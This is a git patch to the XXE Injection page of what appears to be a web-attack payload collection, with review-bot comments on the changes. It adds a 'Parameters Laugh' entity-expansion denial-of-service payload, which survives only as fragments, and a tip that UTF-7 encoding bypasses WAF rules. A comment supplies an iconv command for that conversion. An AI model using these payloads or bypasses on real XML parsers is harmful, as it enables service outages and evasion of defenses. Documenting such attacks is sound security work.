From 6bbdc85aa2dc002c8888252890e84a0f967d59dd Mon Sep 17 00:00:00 2001 From: Quentin Ligier Date: Mon, 3 Oct 2022 17:14:22 +0200 Subject: [PATCH] XXE: Improve the documentation - Add two references: "OWASP XXE prevention cheat sheet" and "XXE: How to become a Jedi" - Describe the Parameters Laugh attack - Expand the WAF bypass method with UTF-7 - Update the summary --- XXE Injection/README.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 8136e66..b10c845 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -20,6 +20,8 @@ Syntax: `` - [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) - [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service) - [Billion Laugh Attack](#billion-laugh-attack) + - [Yaml attack](#yaml-attack) + - [Parameters Laugh attack](#parameters-laugh-attack) - [Error Based XXE](#error-based-xxe) - [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) @@ -228,6 +230,20 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` +### Parameters Laugh attack + +A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping. + +```xml +"> + %pe_1;"> + %pe_2;"> + %pe_3;"> + %pe_4; +]> + +``` ## Error Based XXE @@ -591,6 +607,7 @@ we can convert the character encoding to `UTF-16` using [iconv](https://man7.org ```bash cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ``` +UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules. ## Labs 
@@ -599,6 +616,7 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) +* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) * [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka * [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) * [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) @@ -619,3 +637,4 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml * [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) * [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon * [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK +* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin
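Review bot: the two table-of-contents entries in the first hunk (`@@ -20,6 +20,8 @@`) look right, but while editing this list the parent entry `Exploiting XXE to perform a deny of service` should read `denial of service`; if the heading is renamed, the anchor `#exploiting-xxe-to-perform-a-deny-of-service` has to change with it. Also confirm that a `Yaml attack` heading with exactly that slug exists in the body, since only its YAML block (`h: &h [*g,...]`) is visible as context in the next hunk and the new `- [Yaml attack](#yaml-attack)` link will otherwise be dead.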
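Review bot: the description in the new `### Parameters Laugh attack` section (hunk `@@ -228,6 +230,20 @@`) is a sentence fragment and does not say what "delayed interpretation of parameter entities" buys the attacker; one sentence on why deferring the `%` reference matters, i.e. what differs from the general-entity nesting of the Billion Laughs payload just above it, would make the entry usable on its own. Sebastian Pipping is named as the author but no source is linked; since this same patch adds two entries to References, add one for this write-up too. As rendered here only the closing `">` of each declaration survives (`%pe_1;">`, `%pe_2;">`, `%pe_4;`), so double-check that the fenced block in the README actually contains the complete `<!DOCTYPE` and `<!ENTITY % ...>` lines.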
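Review bot: the UTF-7 sentence added after the `iconv` example (hunk `@@ -591,6 +607,7 @@`) gives neither a command nor a caveat, unlike the UTF-16 case it extends. Mirror the existing example, e.g. `cat utf8exploit.xml | iconv -f UTF-8 -t UTF-7 > utf7exploit.xml`, and say that the XML declaration must announce the encoding (`<?xml version="1.0" encoding="UTF-7"?>`) and that the bypass only works where the target parser honours a UTF-7 declaration, since XML 1.0 requires processors to support only UTF-8 and UTF-16. Also put a blank line between the closing fence and the new sentence so it renders as its own paragraph, as the rest of the file does.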